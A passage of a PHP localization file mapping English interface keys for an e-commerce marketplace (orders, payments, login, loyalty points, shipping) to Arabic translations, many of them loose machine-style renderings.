'in_compare' => 'بالمقارنة', 'in_minute' => 'في الدقيقة', 'in_seconds' => 'في ثوان', 'in_stock' => 'في الأوراق المالية', 'in_the_system' => 'في النظام', 'in_their_shops' => 'في متاجرهم', 'in_these_cases_you_have_to_setup_data_for_those_features_after_changing_the_theme.' => 'في هذه الحالات ، يجب عليك إعداد البيانات لتلك الميزات بعد تغيير السمة.', 'inactive' => 'غير نشط', 'inactive_Products' => 'منتجات غير نشطة', 'inbox' => 'صندوق الوارد', 'include' => 'يشمل', 'include_with_product' => 'تشمل مع المنتج', 'incomplete_bank_info' => 'معلومات بنكية غير مكتملة', 'incomplete_info' => 'معلومات غير مكتملة', 'info' => 'معلومات', 'info_inquiry' => 'استفسار المعلومات', 'information' => 'معلومة', 'inhouse' => 'في بيت', 'inhouse_Sales' => 'مبيعات Inhouse', 'inhouse_orders_only' => 'أوامر Inhouse فقط', 'inhouse_product' => 'منتج Inhouse', 'inhouse_product_sale Report' => 'تقرير بيع المنتج Inhouse', 'inhouse_products' => 'منتجات Inhouse', 'inhouse_sale' => 'البيع الداخلي', 'inhouse_shipping' => 'شحن Inhouse', 'inhouse_shipping_method' => 'طريقة الشحن Inhouse', 'inhouse_shop' => 'متجر Inhouse', 'input if you want to change' => 'الإدخال إذا كنت تريد التغيير', 'input_Data' => 'ادخال البيانات', 'input_Field_Type' => 'نوع حقل الإدخال', 'input_field_Name' => 'اسم حقل الإدخال', 'input_png_or_jpg' => 'إدخال PNG أو JPG', 'inquiry' => 'سؤال', 'instagram' => 'Instagram', 'installments' => 'أقساط', 'instruction_will_be_available_very_soon' => 'ستكون التعليمات متاحة قريبًا جدًا', 'instructions' => 'تعليمات', 'integration_id' => 'معرف التكامل', 'into_currency' => 'في العملة', 'invalid_access' => 'دخول غير صالح', 'invalid_customer_data' => 'بيانات العميل غير صالحة', 'invalid_date_range' => 'نطاق تاريخ غير صالح', 'invalid_email_address' => 'عنوان البريد الإلكتروني غير صالح', 'invalid_theme!' => 'موضوع غير صالح!', 'invalid_user' => 'مستخدم غير صالح', 'invite_Your_Friends_&_Businesses' => 'دعوة أصدقائك وأعمالك', 'invite_your_friends_&_businesses' => 'دعوة أصدقائك وأعمالك', 'invoice' => 'فاتورة', 'invoice_to' => 'فاتورة إلى', 'is' => 'يكون', 'is_Required' => 'مطلوب', 'issuer' => 'المصدر', 'it is already refunded you can not change it!!' => 'لقد تم استرداده بالفعل لا يمكنك تغييره !!', 'it_does_not_represent_the_Play_Store_or_App_Store_version' => 'إنه لا يمثل إصدار متجر Play أو متجر التطبيق', 'item' => 'غرض', 'item Details' => 'تفاصيل العنصر', 'item_Details' => 'تفاصيل العنصر', 'item_description' => 'وصف السلعة', 'item_details' => 'تفاصيل العنصر', 'item_discount' => 'خصم البند', 'item_has_been_added_in_your_cart' => 'تمت إضافة العنصر في عربة التسوق الخاصة بك', 'item_has_been_removed_from_cart' => 'تمت إزالة العنصر من العربة', 'item_has_been_removed_from_cart ' => 'تمت إزالة العنصر من العربة', 'item_price' => 'سعر البند', 'items' => 'أغراض', 'items found' => 'العناصر الموجودة', 'items_Price' => 'سعر العناصر', 'items_found' => 'العناصر الموجودة', 'jobs' => 'وظائف', 'john_doe' => 'فلان الفلاني', 'joined' => 'انضم', 'joined_At' => 'انضم في', 'just' => 'فقط', 'key' => 'مفتاح', 'key_id' => 'المعرف الرئيسي', 'key_removed_successfully' => 'إزالته بنجاح', 'key_translated_successfully' => 'مفتاح ترجمة بنجاح', 'label' => 'ملصق', 'language' => 'لغة', 'language_Translate' => 'ترجمة اللغة', 'language_content_table' => 'جدول محتوى اللغة', 'language_setting' => 'إعدادات اللغة', 'language_table' => 'جدول اللغة', 'languages' => 'اللغات', 'last' => 'آخر', 'last_Name' => 'اسم العائلة', 'last_Updated_Stock' => 'آخر سهم محدث', 'last_name' => 'اسم العائلة', 'last_updated' => 'آخر تحديث', 'latest' => 'أحدث', 'latest_product' => 'أحدث المنتجات', 'latest_products' => 'أحدث المنتجات', 'latitude' => 'خط العرض', 'leave_a_Message' => 'ترك رسالة', 'leave_a_comment' => 'اترك تعليقا', 'left' => 'غادر', 'left sidebar' => 'الشريط الجانبي الأيسر', 'let_me_check' => 'دعني أتحقق', 'license' => 'رخصة', 'light' => 'ضوء', 'like_for_BD_880' => 'مثل ل BD 880', 'limit' => 'حد', 'limit_for_same_user' => 'الحد من نفس المستخدم', 'limit_for_same_user_is_required' => 'الحد لنفس المستخدم مطلوب', 'limit_for_same_user_is_required!' => 'الحد لنفس المستخدم مطلوب!', 'limited_Sotcks' => 'محدودة sotcks', 'limited_Stock' => 'كمية محدودة', 'limited_Stocks' => 'الأسهم المحدودة', 'limited_stock' => 'كمية محدودة', 'link' => 'وصلة', 'linkedIn' => 'LinkedIn', 'linked_orders' => 'أوامر مرتبطة', 'liqpay' => 'liqpay', 'list' => 'قائمة', 'list_of_hold_orders' => 'قائمة أوامر التعليق', 'live' => 'يعيش', 'live_chat' => 'دردشة مباشرة', 'loader_gif' => 'GIF اللودر', 'loading_Gif' => 'تحميل GIF', 'location' => 'موقع', 'location_Data' => 'بيانات الموقع', 'location_data' => 'بيانات الموقع', 'login' => 'تسجيل الدخول', 'login_Url_Setup' => 'تسجيل URL تسجيل الدخول', 'login_first' => 'سجل الدخول أولا', 'login_first_for_next_steps' => 'تسجيل الدخول أولاً للخطوات التالية', 'login_for_add_to_cart' => 'تسجيل الدخول لإضافة العربة', 'login_successful' => 'تسجيل الدخول ناجح', 'login_to_your_account' => 'تسجيل الدخول إلى حسابك', 'login_to_your_account.' => 'تسجيل الدخول إلى حسابك.', 'login_to_your_seller_account' => 'تسجيل الدخول إلى حساب البائع الخاص بك', 'login_to_your_seller_account.' => 'تسجيل الدخول إلى حساب البائع الخاص بك.', 'logo' => 'شعار', 'logout' => 'تسجيل خروج', 'longitude' => 'خط الطول', 'low' => 'قليل', 'low_high' => 'منخفض مرتفع', 'low_to_High_Price' => 'انخفاض السعر إلى ارتفاع', 'low_to_high_price' => 'انخفاض السعر إلى ارتفاع', 'lowest_Products' => 'أدنى منتجات', 'loyalty point' => 'نقطة الولاء', 'loyalty point transa...' => 'نقطة الولاء ترانزا ...', 'loyalty_Point_Earn_on_Each_Order' => 'نقطة الولاء كسب في كل أمر', 'loyalty_Points' => 'نقاط الولاء', 'loyalty_point' => 'نقطة الولاء', 'loyalty_point_history' => 'تاريخ الولاء', 'mail' => 'بريد', 'mail_Config' => 'تكوين البريد', 'mail_config' => 'تكوين البريد', 'mail_configuration' => 'تكوين البريد', 'mail_received_successfully' => 'تم استلام البريد بنجاح', 'mail_template' => 'قالب البريد', 'mail_us' => 'أرسلنا بالبريد', 'mailer_name' => 'اسم البريد', 'main' => 'رئيسي', 'main_Banner' => 'لافتة رئيسية', 'main_Section_Banner' => 'لافتة القسم الرئيسي', 'main_banner_form' => 'شكل لافتة رئيسي', 'maintenance_mode' => 'نمط الصيانة', 'maintenance_mode_activated_for_others_you_can_update_now' => 'وضع الصيانة المنشط للآخرين يمكنك التحديث الآن', 'make_sure_to_check' => 'تأكد من التحقق', 'manage_deliveries' => 'إدارة عمليات التسليم', 'map_api_hint' => 'NB=> يجب أن يكون لمفتاح العميل تمكين خريطة javaScript API ويمكنك تقييده مع HTTP Rejustere. يجب أن يكون لمفتاح الخادم مفتاح Place API ويمكنك تقييده باستخدام IP.', 'map_api_hint_2' => 'MAP API تلميح 2', 'map_api_key' => 'MAP API مفتاح', 'marketing' => 'تسويق', 'marketing section' => 'قسم التسويق', 'marketing_section' => 'قسم التسويق', 'master_card_number' => 'رقم البطاقة الرئيسية', 'max' => 'الأعلى', 'maximum Login hit' => 'ضرب الحد الأقصى تسجيل الدخول', 'maximum OTP hit' => 'ضرب الحد الأقصى OTP', 'maximum discount' => 'خصم أقصى', 'maximum_Add_Fund_Amount' => 'الحد الأقصى لإضافة مبلغ الصندوق', 'maximum_bonus' => 'ممتاز جيد', 'maximum_discount' => 'خصم أقصى', 'maximum_discount ($)' => 'خصم أقصى ($)', 'maximum_file_size' => 'حجم الملف الأقصى', 'maximum_quantity_270' => 'أقصى كمية 270', 'maximum_size' => 'أكبر مقاس', 'measurement_ID' => 'معرف القياس', 'medium' => 'واسطة', 'mercadopago' => 'Mercadopago', 'merchantEmail' => 'التهديد', 'merchant_Email' => 'البريد الإلكتروني التاجر', 'merchant_ID' => 'معرف التاجر', 'merchant_code' => 'Merchant code', 'message' => 'رسالة', 'message_from_delivery_man' => 'رسالة من رجل التسليم', 'message_from_seller' => 'رسالة من البائع', 'messages' => 'رسائل', 'messaging_sender_id' => 'معرف مرسل المراسلة', 'messaging_service_sid' => 'خدمة المراسلة SID', 'messenger' => 'رسول', 'meta_Description' => 'ميتا الوصف', 'meta_Image' => 'صورة التعريف', 'meta_Title' => 'عنوان الفوقية', 'meta_description' => 'ميتا الوصف', 'meta_image' => 'صورة التعريف', 'meta_title' => 'عنوان الفوقية', 'method' => 'طريقة', 'method_fields' => 'حقول الطريقة', 'method_name' => 'اسم الطريقة', 'methods' => 'طُرق', 'middle' => 'وسط', 'min' => 'دقيقة', 'minimum point for convert to currency is = ' => 'الحد الأدنى للنقطة للتحويل إلى العملة هو=>', 'minimum purchase' => 'الحد الأدنى من الشراء', 'minimum_' => 'الحد الأدنى', 'minimum_8_characters_long' => 'الحد الأدنى 8 أحرف', 'minimum_Add_Fund_Amount' => 'الحد الأدنى لإضافة مبلغ الصندوق', 'minimum_Customer_App_Version' => 'أدنى إصدار تطبيق العميل', 'minimum_Deliveryman_App_Version' => 'إصدار تطبيق الحد الأدنى للتسليم', 'minimum_Order_Amount' => 'الحد الأدنى للطلب', 'minimum_Point_Required_To_Convert' => 'الحد الأدنى للنقطة المطلوبة للتحويل', 'minimum_Seller_app_version' => 'إصدار تطبيق الحد الأدنى للبائع', 'minimum_add_amount' => 'الحد الأدنى إضافة المبلغ', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'لا يمكن أن يكون الحد الأدنى للمبلغ أكبر من الحد الأقصى للمبلغ', 'minimum_order_amount' => 'الحد الأدنى للطلب', 'minimum_order_qty' => 'الحد الأدنى للطلب', 'minimum_order_quantity' => 'أقل كمية ممكن طلبها', 'minimum_order_quantity_cannot_be_less_than_' => 'لا يمكن أن تكون كمية الحد الأدنى للطلب أقل من', 'minimum_point_for_convert_to_currency_is = ' => 'الحد الأدنى للنقطة للتحويل إلى العملة هو=>', 'minimum_point_to_transfer' => 'الحد الأدنى للنقل للنقل', 'minimum_purchase' => 'الحد الأدنى من الشراء', 'minimum_purchase ($)' => 'الحد الأدنى من الشراء ($)', 'minimum_purchase_is_required' => 'الحد الأدنى للشراء مطلوب', 'minimum_purchase_is_required!' => 'الحد الأدنى للشراء مطلوب!', 'minimum_stock_limit_for_warning' => 'الحد الأدنى من الأسهم للتحذير', 'minutes' => 'دقائق', 'mobile_no' => 'رقم المحمول', 'mobile_number' => 'رقم الهاتف المحمول', 'module' => 'وحدة', 'module_permission' => 'إذن الوحدة النمطية', 'modules' => 'الوحدات النمطية', 'money_back_guarantee' => 'ضمان استعادة الاموال', 'money_back_gurranty' => 'أموال عودة المدى', 'more' => 'أكثر', 'more_From_The_Store' => 'المزيد من المتجر', 'more_stores' => 'المزيد من المتاجر', 'most favorite' => 'اكثر تفضيلا', 'most-demanded_product_deleted_successfully' => 'تم حذف المنتج الأكثر طلبًا بنجاح', 'most-favorite' => 'اكثر تفضيلا', 'most_Popular_Stores' => 'المتاجر الأكثر شعبية', 'most_demanded' => 'الأكثر طلبًا', 'most_demanded_product' => 'معظم المنتجات المطلوبة', 'most_demanded_product_update_successfully' => 'معظم تحديث المنتج المطلوب بنجاح', 'most_demanded_table' => 'مطلوب معظم الجدول', 'most_favorite' => 'اكثر تفضيلا', 'most_loved' => 'الأكثر أحببًا', 'most_popular_products' => 'المنتجات الأكثر شعبية', 'most_rated_products' => 'معظم المنتجات تصنيف', 'most_searching' => 'معظم البحث', 'most_visited_categories' => 'معظم الفئات زيارة', 'msg91_sms' => 'MSG91 SMS', 'mtemporary_close' => 'وثيقة القريبة', 'multi_vendor' => 'متعدد البائعين', 'multiply_with_QTY' => 'اضرب مع الكمية', 'must on' => 'يجب على', 'must_on' => 'يجب على', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right' => 'يجب تحميل الصور الحكيمة باللون أولا. يظهر اللون في قسم الصورة أعلى اليمين', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right.' => 'يجب تحميل الصور الحكيمة باللون أولا. يظهر اللون في قسم الصورة أعلى اليمين.', 'my product' => 'المنتج الخاص بي', 'my_Order' => 'طلبي', 'my_Order_List' => 'قائمة طلبي', 'my_Wallet' => 'محفظتى', 'my_address' => 'عنواني', 'my_bank_info' => 'معلومات البنوك الخاصة بي', 'my_cart' => 'عربة التسوق الخاصة بي', 'my_compare_list' => 'قائمة المقارنة الخاصة بي', 'my_loyalty_point' => 'نقطة ولائتي', 'my_order' => 'طلبي', 'my_order_details' => 'تفاصيل طلبي', 'my_profile' => 'ملفي', 'my_shop' => 'متجري', 'my_shop_info' => 'معلومات متجري', 'my_wallet' => 'محفظتى', 'my_wishlist' => 'قائمة امنياتي', 'my_wishlists' => 'طعبي أمنياتي', 'name' => 'اسم', 'nav_menu' => 'قائمة NAV', 'need_product_approval' => 'تحتاج إلى موافقة المنتج', 'negative' => 'سلبي', 'neutral' => 'حيادي', 'new' => 'جديد', 'new product' => 'منتج جديد', 'new product 2023' => 'منتج جديد 2023', 'new shop digital product' => 'منتج رقمي متجر جديد', 'new_Category' => 'فئة جديدة', 'new_Product' => 'منتج جديد', 'new_Products' => 'منتجات جديدة', 'new_Products_Requests' => 'طلبات المنتجات الجديدة', 'new_arrival' => 'قادم جديد', 'new_arrivals' => 'الوافدين الجدد', 'new_language' => 'لغة جديدة', 'new_notification' => 'إشعار جديد', 'new_order' => 'أمر جديد', 'new_password' => 'كلمة المرور الجديدة', 'new_product' => 'منتج جديد', 'new_seller' => 'بائع جديد', 'new_shipping_cost' => 'تكلفة الشحن الجديدة', 'newsletter' => 'النشرة الإخبارية', 'neww seller product' => 'منتج نيو بائع', 'nexmo_sms' => 'Nexmo SMS', 'next' => 'التالي', 'nid' => 'لا', 'no' => 'لا', 'no more review ' => 'لا مزيد من المراجعة', 'no more review remain to load' => 'لا مزيد من المراجعة لا يزال للتحميل', 'no.' => 'لا.', 'no_' => 'لا', 'no_Account' => 'لا حساب', 'no_Color' => 'لا لون', 'no_Rating' => 'لا يوجد تقييم', 'no_account' => 'لا حساب', 'no_account_Sign_up_now' => 'لا يوجد حساب اشترك الآن', 'no_address_is_saved' => 'لا يتم حفظ أي عنوان', 'no_attachment_found' => 'لم يتم العثور على مرفق', 'no_billing_address_found' => 'لم يتم العثور على عنوان الفواتير', 'no_color' => 'لا لون', 'no_comment_found' => 'لم يتم العثور على تعليق', 'no_conversation_found' => 'لم يتم العثور على محادثة', 'no_country_found' => 'لم يتم العثور على بلد', 'no_country_to_deliver' => 'لا يوجد دولة لتقديمها', 'no_customer_found' => 'لم يتم العثور على عميل', 'no_data_found' => 'لاتوجد بيانات', 'no_data_to_found' => 'لا توجد بيانات يمكن العثور عليها', 'no_data_to_show' => 'لا توجد بيانات لإظهارها', 'no_delivery_man_assigned' => 'لم يتم تعيين رجل توصيل', 'no_delivery_man_assigned_yet' => 'لم يتم تعيين رجل توصيل حتى الآن', 'no_discount' => 'لا خصم', 'no_items_in_basket' => 'لا توجد عناصر في السلة', 'no_location_found' => 'لم يتم العثور على موقع', 'no_message_available' => 'لا توجد رسائل متاحة', 'no_more_review_remain_to_load' => 'لا مزيد من المراجعة لا يزال للتحميل', 'no_order_found' => 'لم يتم العثور على أمر', 'no_rating' => 'لا يوجد تقييم', 'no_review' => 'لا مراجعة', 'no_shipping_address_found' => 'لم يتم العثور على عنوان الشحن', 'no_shipping_method_selected' => 'لم يتم تحديد طريقة الشحن', 'no_similar_products_found' => 'لم يتم العثور على منتجات مماثلة', 'no_thanks' => 'ًلا شكرا', 'no_transaction_found' => 'لم يتم العثور على معاملة', 'no_zip_code_found' => 'لم يتم العثور على رمز بريدي', 'not' => 'لا', 'not match' => 'لا يتطابق', 'not_assign_yet' => 'لا تخصص بعد', 'not_assigned' => 'غيرمعتمد', 'not_available' => 'غير متاح', 'not_found' => 'غير معثور عليه', 'not_found_anything' => 'لم يتم العثور على أي شيء', 'not_match' => 'لا يتطابق', 'not_reviewed_yet' => 'لم تتم مراجعتها بعد', 'note' => 'ملحوظة', 'note_from_seller' => 'ملاحظة من البائع', 'notification' => 'إشعار', 'notification deleted successfully' => 'تم حذف الإخطار بنجاح', 'notification_count' => 'عدد الإخطار', 'notification_deleted_successfully' => 'تم حذف الإخطار بنجاح', 'notifications' => 'إشعارات', 'notificatios' => 'Notificatios', 'notify_All_the_Sellers' => 'إخطار جميع البائعين', 'now' => 'الآن', 'now_copy' => 'الآن نسخ', 'now_go_to' => 'اذهب الآن', 'now_you_can_login' => 'الآن يمكنك تسجيل الدخول', 'now_youâll_be_successfully_able_to_use_the_addons_for_your_6Valley_website' => 'الآن يمكنك أن تكون قادرًا بنجاح على استخدام الإضافات لموقع 6Valley الخاص بك', 'now_youâll_be_successfully_able_to_use_the_theme_for_your' => 'الآن يمكنك أن تتمكن بنجاح من استخدام السمة الخاصة بك', 'now_youâll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'الآن يمكنك أن تكون قادرًا بنجاح على استخدام السمة لموقع الويب الخاص بك 6Valley', 'number' => 'رقم', 'oR_SHARE' => 'أو شارك', 'oder_Transaction_Statement' => 'بيان معاملة ODER', 'of' => 'ل', 'off' => 'عن', 'offer_ends_in' => 'العرض ينتهي', 'offers' => 'عروض', 'offers_&_Deals' => 'العروض والصفقات', 'offers_and_events' => 'العروض والأحداث', 'office' => 'مكتب', 'offline' => 'غير متصل على الانترنت', 'offline payment' => 'الدفع في وضع عدم الاتصال', 'offline_Payment' => 'الدفع في وضع عدم الاتصال', 'offline_Payment_Method' => 'طريقة الدفع في وضع عدم الاتصال', 'offline_Payment_Methods' => 'طرق الدفع في وضع عدم الاتصال', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_seller_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'يتيح الدفع على الإنترنت للعملاء استخدام أساليب الدفع الخارجية. يجب عليهم مشاركة تفاصيل الدفع مع البائع بعد ذلك. يمكن للمسؤول تعيين ما إذا كان يمكن للعملاء سداد المدفوعات دون اتصال عن طريق تمكين/تعطيل هذا الزر.', 'offline_Payments' => 'مدفوعات غير متصلة بالإنترنت', 'offline_payment' => 'الدفع في وضع عدم الاتصال', 'offline_payment_method_added_successfully' => 'تمت إضافة طريقة الدفع على الإنترنت بنجاح', 'offline_payment_method_delete_successfully' => 'طريقة الدفع في وضع عدم الاتصال بنجاح', 'offline_payment_method_not_found' => 'لم يتم العثور على طريقة الدفع على الإنترنت', 'offline_payment_method_update_successfully' => 'تحديث طريقة الدفع في وضع عدم الاتصال بنجاح', 'offline_payments' => 'مدفوعات غير متصلة بالإنترنت', 'offline_seller' => 'بائع غير متصل', 'ok' => 'نعم', 'old' => 'قديم', 'on' => 'على', 'on_product' => 'على المنتج', 'on_vacation' => 'في عطلة', 'on_vacation_mode' => 'في وضع العطلة', 'once_deleted_you_will_not_be_able_to_recover_this' => 'بمجرد حذفك ، لن تتمكن من استرداد هذا', 'once_you_delete' => 'بمجرد حذف', 'once_you_have_downloaded_and_filled_the_format_file' => 'بمجرد تنزيل ملف التنسيق وملئه', 'one_step_ahead' => 'خطوة للأمام', 'one_time_password' => 'كلمة السر لمرة واحدة', 'ongoing' => 'جاري التنفيذ', 'ongoing_Orders' => 'أوامر مستمرة', 'online_Shopping' => 'التسوق عبر الانترنت', 'online_seller' => 'البائع عبر الإنترنت', 'online_shopping' => 'التسوق عبر الانترنت', 'only_Admin_can_create_an_account_for_any_seller' => 'يمكن للمسؤول فقط إنشاء حساب لأي بائع', 'only_available_when_order_is_out_for_delivery' => 'متاح فقط عندما يكون الطلب خارج التسليم', 'only_earning_point_can_converted_to_wallet_money' => 'يمكن فقط تحويل نقطة الكسب إلى أموال محفظة', 'only_the_Admin_Panel_&_Seller_Panel_will_be_functional' => 'لن تكون لوحة المشرف ولوحة البائع الوظيفية فقط', 'open' => 'يفتح', 'open_your_and_start_selling.' => 'افتحك وابدأ البيع.', 'open_your_shop_and_start_selling.' => 'افتح متجرك وابدأ البيع.', 'optional' => 'خياري', 'optional please provide embed link not direct link' => 'اختياري يرجى تقديم رابط التضمين وليس الرابط المباشر', 'optional please provide embed link not direct link.' => 'اختياري يرجى توفير رابط التضمين وليس الرابط المباشر.', 'optional_please_provide_embed_link_not_direct_link' => 'اختياري يرجى تقديم رابط التضمين وليس الرابط المباشر', 'or_continue_with' => 'أو متابعة', 'or_some_coupons_are_for_all_sellers' => 'أو بعض القسائم لجميع البائعين', 'or_you_have_any_other_questions' => 'أو لديك أي أسئلة أخرى', 'order' => 'طلب', 'order details' => 'تفاصيل الطلب', 'order expected deliv...' => 'أمر متوقع deliv ...', 'order is already delivered' => 'تم تسليم الطلب بالفعل', 'order payment' => 'دفع النظام', 'order place' => 'مكان', 'order refund' => 'ترتيب الاسترداد', 'order status histori...' => 'حالة الطلب التاريخية ...', 'order transactions' => 'المعاملات أمر', 'order wise' => 'أمر حكيم', 'order wise seller shipping' => 'طلب شحن البائع الحكيمة', 'order wise shipping' => 'طلب الشحن الحكيم', 'order wise shipping cost' => 'طلب تكلفة الشحن الحكيمة', 'order wise shipping method Status updated successfully' => 'طلب حالة طريقة الشحن الحكيمة تحديث بنجاح', 'order_&_Shipping_Info' => 'معلومات الطلب والشحن', 'order_Amount' => 'كمية الطلب', 'order_Canceled' => 'تم إلغاء الطلب', 'order_Complete' => 'الطلب جاهز', 'order_Confirmation_Message' => 'رسالة تأكيد الطلب', 'order_Date' => 'تاريخ الطلب', 'order_Delivered_Message' => 'طلب رسالة تسليمها', 'order_Delivery_Verification' => 'طلب تسليم', 'order_Details' => 'تفاصيل الطلب', 'order_Failed_Message' => 'رسالة فاشلة الطلب', 'order_ID' => 'رقم التعريف الخاص بالطلب', 'order_Invoice' => 'طلب فاتورة', 'order_List' => 'لائحة الطلبات', 'order_No' => 'أمر لا', 'order_Packaging_Message' => 'طلب رسالة التغليف', 'order_Pending_Message' => 'طلب رسالة معلقة', 'order_Placed_Successfully' => 'وضع النظام بنجاح', 'order_Report' => 'تقرير الطلب', 'order_Returned_Message' => 'ترتيب الرسالة التي تم إرجاعها', 'order_Settings' => 'إعدادات الطلب', 'order_Shipped' => 'ترتيب شحن', 'order_Statistics' => 'إحصائيات الطلب', 'order_Status' => 'حالة الطلب', 'order_Table' => 'جدول الطلب', 'order_Transaction_Statement' => 'أمر معاملة الطلب', 'order_Transactions' => 'المعاملات أمر', 'order_Type' => 'نوع الطلب', 'order_Verification' => 'التحقق من الطلب', 'order_again' => 'أجل مرة أخرى', 'order_amount' => 'كمية الطلب', 'order_can_be_canceled_only_when_pending.' => 'يمكن إلغاء الطلب فقط عند انتظار.', 'order_canceled' => 'تم إلغاء الطلب', 'order_canceled_message' => 'طلب رسالة تم إلغاؤها', 'order_canceled_successfully' => 'تم إلغاء الطلب بنجاح', 'order_complete' => 'الطلب جاهز', 'order_created_at' => 'ترتيب تم إنشاؤه في', 'order_date' => 'تاريخ الطلب', 'order_delivered' => 'أجل تسليم', 'order_details' => 'تفاصيل الطلب', 'order_details_id' => 'اطلب تفاصيل معرف', 'order_failed_!_Sorry_we_can`t_complete_your_order' => 'فشل الطلب! آسف لا يمكننا إكمال طلبك', 'order_filter_success' => 'طلب مرشح النجاح', 'order_hasbeen_cancelled' => 'طلب hasbeen إلغاء', 'order_id' => 'رقم التعريف الخاص بالطلب', 'order_info' => 'معلومات الطلب', 'order_invoice' => 'طلب فاتورة', 'order_is_already_delivered.' => 'تم تسليم الطلب بالفعل.', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'تم تسليم الطلب بالفعل وقد تم صرف مبلغ المعاملات المتغيرة يمكن أن يكون سبب سوء التقدير', 'order_is_already_delivered_you_can_not_change_it' => 'تم تسليم الطلب بالفعل لا يمكنك تغييره', 'order_is_on_the_way' => 'النظام في الطريق', 'order_list' => 'لائحة الطلبات', 'order_management' => 'إدارة الطلبات', 'order_no' => 'أمر لا', 'order_note' => 'طلب ملاحظة', 'order_out_for_delivery_Message' => 'اطلب رسالة التسليم', 'order_place' => 'مكان', 'order_placed' => 'تم الطلب', 'order_placed_successfully' => 'وضع النظام بنجاح', 'order_refund' => 'ترتيب الاسترداد', 'order_refunded_message' => 'طلب رسالة استرداد', 'order_returned._Product_Successfully_Returned' => 'عاد الأمر. تم إرجاع المنتج بنجاح', 'order_settings' => 'إعدادات الطلب', 'order_sort_by_(high_to_low)' => 'ترتيب الفرز حسب (عالية إلى منخفض)', 'order_sort_by_(low_to_high)' => 'ترتيب فرز (منخفض إلى مرتفع)', 'order_status' => 'حالة الطلب', 'order_status_returned._Product_Successfully_Returned' => 'تم إرجاع حالة الطلب. تم إرجاع المنتج بنجاح', 'order_summary' => 'ملخص الطلب', 'order_table' => 'جدول الطلب', 'order_transactions' => 'المعاملات أمر', 'order_type' => 'نوع الطلب', 'order_verification' => 'التحقق من الطلب', 'order_verification_code' => 'طلب رمز التحقق', 'order_wise' => 'أمر حكيم', 'order_wise_shipping_method' => 'طلب طريقة الشحن الحكيمة', 'order_wise_shipping_method_Status_updated_successfully' => 'طلب حالة طريقة الشحن الحكيمة تحديث بنجاح', 'order_wise_shipping_method_status_updated_successfully' => 'طلب حالة طريقة الشحن الحكيمة تحديث بنجاح', 'orders' => 'طلبات', 'orders_Served' => 'أوامر الخدم', 'other' => 'آخر', 'other_stores' => 'متاجر أخرى', 'other_wise_these_section_data_would_not_function_properly_in_website_and_user_apps' => 'من الحكمة الأخرى هذه البيانات القسم لن تعمل بشكل صحيح في موقع الويب وتطبيقات المستخدم', 'others' => 'آحرون', 'others_store' => 'متجر آخرون', 'otp_not_found' => 'لم يتم العثور على OTP', 'otp_template' => 'قالب OTP', 'out_For_Delivery' => 'خارج للتوصيل', 'out_for_delivery' => 'خارج للتوصيل', 'out_for_delivery_orders' => 'خارج أوامر التسليم', 'out_of_Stock' => 'إنتهى من المخزن', 'out_of_stock' => 'إنتهى من المخزن', 'out_of_stock!' => 'إنتهى من المخزن!', 'overall_Statistics' => 'الإحصاءات الشاملة', 'overall_statistics' => 'الإحصاءات الشاملة', 'overview' => 'ملخص', 'packaging' => 'التغليف', 'packaging_order' => 'أمر التغليف', 'page_Not_found' => 'الصفحة غير موجودة', 'page_setup' => 'اعداد الصفحة', 'pages' => 'الصفحات', 'pagination' => 'ترقيم الصفحات', 'pagination_settings' => 'إعدادات ترقيم الصفحات', 'paid' => 'مدفوع', 'paid_By' => 'دفعت بواسطة', 'paid_by' => 'دفعت بواسطة', 'paid_phone_number' => 'رقم هاتف مدفوع', 'paid_to' => 'المدفوعة لل', 'partner_request' => 'طلب الشريك', 'passport' => 'جواز سفر', 'password' => 'كلمة المرور', 'password Must Be 6 Character' => 'يجب أن تكون كلمة المرور 6 أحرف', 'password_Must_Be_6_Character' => 'يجب أن تكون كلمة المرور 6 أحرف', 'password_does_not_match' => 'كلمة السر غير متطابقة', 'password_doesn t_Match' => 'كلمة المرور لا تتطابق', 'password_doesn t_match' => 'كلمة المرور لا تتطابق', 'password_minimum_8_characters' => 'الحد الأدنى لما لا يقل عن 8 أحرف', 'passwords_do_not_match' => 'كلمة المرور غير مطابقة', 'passwords_match' => 'كلمات السر متطابقة', 'paste in the input filed below and' => 'لصق في المدخلات المودعة أدناه و', 'paste_in_the_input_filed_below_and' => 'لصق في المدخلات المودعة أدناه و', 'paste_script' => 'لصق السيناريو', 'pay by wallet' => 'الدفع بالمحفظة', 'pay_by_wallet' => 'الدفع بالمحفظة', 'pay_with_secure_Digital_payment_gateways' => 'ادفع مع بوابات الدفع الرقمية الآمنة', 'pay_your_bill_using_any_of_the_payment_method_below_and_input_the_required_information_in_the_form' => 'ادفع فاتورتك باستخدام أي من طريقة الدفع أدناه وإدخال المعلومات المطلوبة في النموذج', 'payer_id' => 'معرف الدافع', 'payer_info' => 'معلومات دافع', 'payer_name' => 'اسم الدافع', 'payment' => 'قسط', 'paymentUrl' => 'Paymenturl', 'payment_By' => 'الدفع بواسطة', 'payment_Info' => 'معلومات الدفع', 'payment_Information' => 'معلومات الدفع', 'payment_Method' => 'طريقة الدفع او السداد', 'payment_Method_Name' => 'اسم طريقة الدفع', 'payment_Methods' => 'طرق الدفع', 'payment_Note' => 'مذكرة الدفع', 'payment_Reference' => 'إشارة دفع', 'payment_Statistics' => 'إحصائيات الدفع', 'payment_Status' => 'حالة السداد', 'payment_Url' => 'عنوان URL للدفع', 'payment_by' => 'الدفع بواسطة', 'payment_details' => 'بيانات الدفع', 'payment_for' => 'دفع ل', 'payment_gateway_configuration' => 'تكوين بوابة الدفع', 'payment_gateway_title' => 'عنوان بوابة الدفع', 'payment_info' => 'معلومات الدفع', 'payment_method' => 'طريقة الدفع او السداد', 'payment_method_info' => 'معلومات طريقة الدفع', 'payment_methods' => 'طرق الدفع', 'payment_note' => 'مذكرة الدفع', 'payment_option' => 'خيار الدفع', 'payment_receiver_id' => 'معرف استقبال الدفع', 'payment_setup' => 'إعداد الدفع', 'payment_status' => 'حالة السداد', 'payments' => 'المدفوعات', 'payments_Amount' => 'مبلغ المدفوعات', 'paymob_accept' => 'Paymob قبول', 'paymob_supports_EGP_currency' => 